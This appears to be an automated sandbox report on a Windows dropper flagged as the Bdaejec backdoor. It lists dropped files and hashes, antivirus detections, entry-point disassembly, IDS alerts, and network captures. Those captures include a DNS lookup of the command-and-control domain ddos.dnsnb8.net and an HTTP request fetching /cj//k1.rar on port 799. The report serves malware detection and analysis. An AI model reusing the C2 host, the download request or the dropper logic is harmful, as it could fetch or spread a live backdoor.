                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.6.4.1.3.7.1.6.4.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.6.4.2.4.6.5.4.0.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.f.e.4.6.9.0.-.f.6.8.5.-.4.5.e.f.-.b.a.b.5.-.6.b.0.b.7.7.4.3.8.9.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.b.3.9.f.6.-.0.b.4.9.-.4.0.5.5.-.a.e.7.6.-.a.7.3.b.5.6.a.d.7.c.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.i.v.J.T.s.F.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.2.c.-.0.0.0.1.-.0.0.1.4.-.3.f.9.5.-.d.0.f.b.1.a.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.f.3.2.4.0.b.2.8.f.4.0.f.f.e.3.4.3.7.6.1.a.9.f.e.5.1.4.1.5.e.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.I.i.v.J.T.s.F.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Sat Dec 28 11:24:01 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):165808
                            Entropy (8bit):1.7950274724675217
                            Encrypted:false
                            SSDEEP:384:LGT4bASAMB9l1SvwWHgjkvUl1yVjBhx9tVoWjJJ7WifY2Z:50QB9l14wWAgvUloJ9fKWjb7
                            MD5:10510B3C4EEA426A7D5081A9844DBCBF
                            SHA1:C24B7DDDFB0F3FB5515FCDA52E171FF301340065
                            SHA-256:B7837F693B8645D3EFDDFA5428A7D9356CF1AD367FC03712BE463C19CCB7F094
                            SHA-512:A43EC101D2C3466B564C358A5AA14772C60F802385E16CFE8ABCE96DEF1267A8B7F767DD1195FC45D293FEFB474544D0621C33173B86ED703DE2F0764FDA9E00
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .........og............t...............|.......d...lQ..........T.......8...........T...........8<..xK.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......,.....og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):6280
                            Entropy (8bit):3.722103987938504
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbFH6pcYzCzxHN5aMQUG89bPJF/sfu4H9J9m:R6l7wVeJFH6pcYzCxpDG89bz/sfZHRm
                            MD5:6FB3A38F0776D3D720EADA38711DE0C9
                            SHA1:F2D97D29B5DFE89AF28EB56D70ED3EF3BBA11F72
                            SHA-256:18A6DFAE4702F05EEDD68FE8D46A8749A00CA77DD13A989ADFB30DA5DE94DDB4
                            SHA-512:5CDB7D1613EB1BF553CA106CD3FA6803B3FFF09B36ED8000A3E81C5636E72C5847E8921C63F0CB02E9854BDB71B6B03176482B394D0DA1494C04CF030EE0EDFA
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.0.8.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4565
                            Entropy (8bit):4.4606453672004935
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsiJg77aI9NSWpW8VY9Ym8M4JkaF3D+q8SVVSIg6ad:uIjfwI7Lz7V5JxDpV5g6ad
                            MD5:4EA6337AEAA0B9D6877F4F833E5C6028
                            SHA1:49E01EEAA96380CC151D761F85591108CACBD4E7
                            SHA-256:AF9C274DC0D952573DB497E2531425A0A7F72FE6E72FDFAB268F5C5795153B14
                            SHA-512:F20D12E6C22A5C48B5A3A4EBAB92BCBF79925EC4B6FB9BADD96A87D729106BE422C0A7FF1A1DDBF622DFDCAFE6E6E68F19939DF0BB262C50F0FF6EDBF84C61AE
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651026" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:foo.
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:ASCII text
                            Category:modified
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\Desktop\gT6IitwToH.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):15872
                            Entropy (8bit):7.031113762428177
                            Encrypted:false
                            SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                            MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                            SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                            SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                            SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 97%
                            Joe Sandbox View:
                            • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                            • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                            • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                            • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                            • Filename: ib.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                            • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.466056531032068
                            Encrypted:false
                            SSDEEP:6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNUdwBCswSbnz:wXD94+WlLZMM6YFHK+n
                            MD5:F32D6C645169437B47B024E84EF1A3BA
                            SHA1:6F897114AF6DC86525D5D2F8788365EEE61D0DED
                            SHA-256:124F0BDA6478A2C2A1EBD8FEEFBFB409302D4E604144D48239994B6C90538399
                            SHA-512:020AEF1383676E3D5A1198FCEDD8FD99FEAAB913AA4A9B0E271821155C083135DDA87F1F4B98E566CA0D1569BF1D76CDA28B6563D5E4537F907E8FD9D5285157
                            Malicious:false
                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Y..............................................................................................................................................................................................................................................................................................................................................F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.575697014918129
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:gT6IitwToH.exe
                            File size:82'432 bytes
                            MD5:8da10c130681fd03a6b64ad9a827a433
                            SHA1:55be25e240ff1eebca02e9db0f9cec91f03729c3
                            SHA256:45c750869e31ed836f892cb85fe2d968146a3ae10261f1e28cef8e61b8265f55
                            SHA512:8e86e44b229c5d0b9014997f19f4f27f3aebed36d4566a8c7705e29b525ca6cfc67546ee9759c190c44ae1d3da13bd371b5fce21ffb4e2c9469b3f9b0dc603dc
                            SSDEEP:1536:Yg/6/tM8NXDjPX0QWlfGMckTQK0GCq2iW7z:Hk3U8kTQTGCH
                            TLSH:A1838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x414000
                            Entrypoint Section:wu
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x518BB101 [Thu May 9 14:21:53 2013 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:ba2c974ed567c90fe365844af978f320
                            Instruction
                            push ebp
                            mov ebp, esp
                            sub esp, 0000016Ch
                            xor eax, eax
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-24h], eax
                            mov dword ptr [ebp-10h], eax
                            mov dword ptr [ebp-14h], eax
                            mov dword ptr [ebp-08h], eax
                            mov dword ptr [ebp-0Ch], eax
                            mov dword ptr [ebp-20h], eax
                            mov dword ptr [ebp-18h], eax
                            mov dword ptr [ebp-48h], 4A766949h
                            mov dword ptr [ebp-44h], 44467354h
                            mov dword ptr [ebp-40h], 6578652Eh
                            mov dword ptr [ebp-3Ch], 00000000h
                            call 00007F002CB7A045h
                            pop eax
                            add eax, 00000225h
                            mov dword ptr [ebp-04h], eax
                            mov eax, dword ptr fs:[00000030h]
                            mov dword ptr [ebp-28h], eax
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax], E904C483h
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax+04h], FFFEE3A2h
                            mov eax, dword ptr [ebp-28h]
                            mov eax, dword ptr [eax+0Ch]
                            mov eax, dword ptr [eax+1Ch]
                            mov eax, dword ptr [eax]
                            mov eax, dword ptr [eax+08h]
                            mov ecx, dword ptr [eax+3Ch]
                            mov ecx, dword ptr [ecx+eax+78h]
                            add ecx, eax
                            mov edi, dword ptr [ecx+1Ch]
                            mov ebx, dword ptr [ecx+20h]
                            mov esi, dword ptr [ecx+24h]
                            mov ecx, dword ptr [ecx+18h]
                            add esi, eax
                            add edi, eax
                            add ebx, eax
                            xor edx, edx
                            mov dword ptr [ebp-30h], esi
                            mov dword ptr [ebp-1Ch], edx
                            mov dword ptr [ebp-34h], ecx
                            cmp edx, dword ptr [ebp-34h]
                            jnc 00007F002CB7A18Eh
                            movzx ecx, word ptr [esi+edx*2]
                            mov edx, dword ptr [ebx+edx*4]
                            mov esi, dword ptr [edi+ecx*4]
                            add edx, eax
                            mov ecx, dword ptr [edx]
                            add esi, eax
                            cmp ecx, 4D746547h
                            jne 00007F002CB7A094h
                            cmp dword ptr [edx+04h], 6C75646Fh
                            jne 00007F002CB7A08Bh
                            Programming Language:
                            • [IMP] VS2005 build 50727
                            • [C++] VS2008 build 21022
                            • [ASM] VS2008 build 21022
                            • [ C ] VS2008 build 21022
                            • [LNK] VS2008 build 21022
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf9340x28.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf4880x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x140.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xc9ed0xca009c1449c399f02a55d49d67dd9413e89cFalse0.6139193997524752data6.618135871473556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xe0000x20680x2200c3c323d1b4244bb08b2144d7f6ccb84fFalse0.349609375data5.290951954639895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x110000x2bc40x10003ecb8d5c354d07019fd9bd96c5e5f3a1False0.20947265625data2.251287542215587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            wu0x140000x50000x42005f5af39b4eb409d3a0580a9374b29279False0.7772845643939394data6.935243059177517IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            KERNEL32.dllGenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-28T12:23:57.549164+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.4651031.1.1.153UDP
                            2024-12-28T12:23:59.200458+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973044.221.84.105799TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:23:58.100351095 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:58.219991922 CET7994973044.221.84.105192.168.2.4
                            Dec 28, 2024 12:23:58.220078945 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:58.220408916 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:58.340631962 CET7994973044.221.84.105192.168.2.4
                            Dec 28, 2024 12:23:59.200376987 CET7994973044.221.84.105192.168.2.4
                            Dec 28, 2024 12:23:59.200442076 CET7994973044.221.84.105192.168.2.4
                            Dec 28, 2024 12:23:59.200458050 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:59.200586081 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:59.205560923 CET49730799192.168.2.444.221.84.105
                            Dec 28, 2024 12:23:59.325092077 CET7994973044.221.84.105192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:23:57.549164057 CET6510353192.168.2.41.1.1.1
                            Dec 28, 2024 12:23:58.094371080 CET53651031.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 28, 2024 12:23:57.549164057 CET192.168.2.41.1.1.10xb3e1Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 28, 2024 12:23:58.094371080 CET1.1.1.1192.168.2.40xb3e1No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                            • ddos.dnsnb8.net:799
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.44973044.221.84.1057994908C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            TimestampBytes transferredDirectionData
                            Dec 28, 2024 12:23:58.220408916 CET288OUTGET /cj//k1.rar HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ddos.dnsnb8.net:799
                            Connection: Keep-Alive


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:06:23:56
                            Start date:28/12/2024
                            Path:C:\Users\user\Desktop\gT6IitwToH.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\gT6IitwToH.exe"
                            Imagebase:0x400000
                            File size:82'432 bytes
                            MD5 hash:8DA10C130681FD03A6B64AD9A827A433
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:06:23:56
                            Start date:28/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            Imagebase:0x250000
                            File size:15'872 bytes
                            MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 97%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:4
                            Start time:06:24:01
                            Start date:28/12/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392
                            Imagebase:0xaa0000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:6.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:4%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:74
                              execution_graph 6967 414000 6969 414044 GetPEB 6967->6969 6970 414077 CreateFileA 6969->6970 6972 414265 6970->6972 6973 41422d 6970->6973 6974 414246 WriteFile 6973->6974 6975 414244 6973->6975 6976 414255 CloseHandle WinExec 6974->6976 6975->6976 6976->6972 6977 4024c4 6978 4024d5 6977->6978 7014 4064d7 HeapCreate 6978->7014 6981 402514 7016 4052b7 GetModuleHandleW 6981->7016 6985 40246c _fast_error_exit 67 API calls 6986 402525 __RTC_Initialize 6985->6986 7050 40332b 6986->7050 6988 402533 6989 40253f GetCommandLineA 6988->6989 7142 402164 6988->7142 7065 4063a0 6989->7065 6996 402564 7101 40606d 6996->7101 6997 402164 __amsg_exit 67 API calls 6997->6996 7000 402575 7116 402223 7000->7116 7001 402164 __amsg_exit 67 API calls 7001->7000 7003 40257c 7004 402587 7003->7004 7005 402164 __amsg_exit 67 API calls 7003->7005 7122 40600e 7004->7122 7005->7004 7010 4025b6 7149 402400 7010->7149 7013 4025bb ___lock_fhandle 7015 402508 7014->7015 7015->6981 7134 40246c 7015->7134 7017 4052d2 7016->7017 7018 4052cb 7016->7018 7020 40543a 7017->7020 7021 4052dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7017->7021 7152 402134 7018->7152 7211 404fd1 7020->7211 7023 405325 TlsAlloc 7021->7023 7026 40251a 7023->7026 7027 405373 TlsSetValue 7023->7027 7026->6985 7026->6986 7027->7026 7028 405384 7027->7028 7156 40241e 7028->7156 7033 404ea7 __encode_pointer 6 API calls 7034 4053a4 7033->7034 7035 404ea7 __encode_pointer 6 API calls 7034->7035 7036 4053b4 7035->7036 7037 404ea7 __encode_pointer 6 API calls 7036->7037 7038 4053c4 7037->7038 7173 403d7d 7038->7173 7045 404f22 __decode_pointer 6 API calls 7046 405418 7045->7046 7046->7020 7047 40541f 7046->7047 7193 40500e 7047->7193 7049 405427 GetCurrentThreadId 7049->7026 7543 40379c 7050->7543 7052 403337 GetStartupInfoA 7053 4039d1 __calloc_crt 67 API calls 7052->7053 7061 403358 7053->7061 7054 403576 ___lock_fhandle 7054->6988 7055 4034f3 GetStdHandle 7060 4034bd 7055->7060 7056 4039d1 __calloc_crt 67 API calls 7056->7061 7057 403558 SetHandleCount 7057->7054 7058 403505 GetFileType 7058->7060 7059 403440 7059->7054 7059->7060 7063 403469 GetFileType 7059->7063 7064 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7059->7064 7060->7054 7060->7055 7060->7057 7060->7058 7062 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7060->7062 7061->7054 7061->7056 7061->7059 7061->7060 7062->7060 7063->7059 7064->7059 7066 4063dd 7065->7066 7067 4063be GetEnvironmentStringsW 7065->7067 7069 4063c6 7066->7069 7070 406476 7066->7070 7068 4063d2 GetLastError 7067->7068 7067->7069 7068->7066 7071 4063f9 GetEnvironmentStringsW 7069->7071 7075 406408 WideCharToMultiByte 7069->7075 7072 40647f GetEnvironmentStrings 7070->7072 7073 40254f 7070->7073 7071->7073 7071->7075 7072->7073 7078 40648f 7072->7078 7090 4062e5 7073->7090 7076 40646b FreeEnvironmentStringsW 7075->7076 7077 40643c 7075->7077 7076->7073 7080 40398c __malloc_crt 67 API calls 7077->7080 7079 40398c __malloc_crt 67 API calls 7078->7079 7081 4064a9 7079->7081 7082 406442 7080->7082 7083 4064b0 FreeEnvironmentStringsA 7081->7083 7084 4064bc ___crtGetEnvironmentStringsA 7081->7084 7082->7076 7085 40644a WideCharToMultiByte 7082->7085 7083->7073 7088 4064c6 FreeEnvironmentStringsA 7084->7088 7086 406464 7085->7086 7087 40645c 7085->7087 7086->7076 7089 403abd __freea 67 API calls 7087->7089 7088->7073 7089->7086 7091 4062fa 7090->7091 7092 4062ff GetModuleFileNameA 7090->7092 7550 404b64 7091->7550 7094 406326 7092->7094 7544 40614b 7094->7544 7096 402559 7096->6996 7096->6997 7098 40398c __malloc_crt 67 API calls 7099 406368 7098->7099 7099->7096 7100 40614b _parse_cmdline 77 API calls 7099->7100 7100->7096 7102 406076 7101->7102 7105 40607b _strlen 7101->7105 7103 404b64 ___initmbctable 111 API calls 7102->7103 7103->7105 7104 40256a 7104->7000 7104->7001 7105->7104 7106 4039d1 __calloc_crt 67 API calls 7105->7106 7111 4060b0 _strlen 7106->7111 7107 40610e 7108 403abd __freea 67 API calls 7107->7108 7108->7104 7109 4039d1 __calloc_crt 67 API calls 7109->7111 7110 406134 7112 403abd __freea 67 API calls 7110->7112 7111->7104 7111->7107 7111->7109 7111->7110 7113 408f6b _strcpy_s 67 API calls 7111->7113 7114 4060f5 7111->7114 7112->7104 7113->7111 7114->7111 7115 4035c0 __invoke_watson 10 API calls 7114->7115 7115->7114 